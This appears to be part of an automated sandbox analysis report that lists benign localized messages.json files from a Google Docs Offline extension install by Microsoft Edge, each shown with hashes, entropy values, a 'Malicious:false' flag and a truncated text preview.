                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ms\messages.json

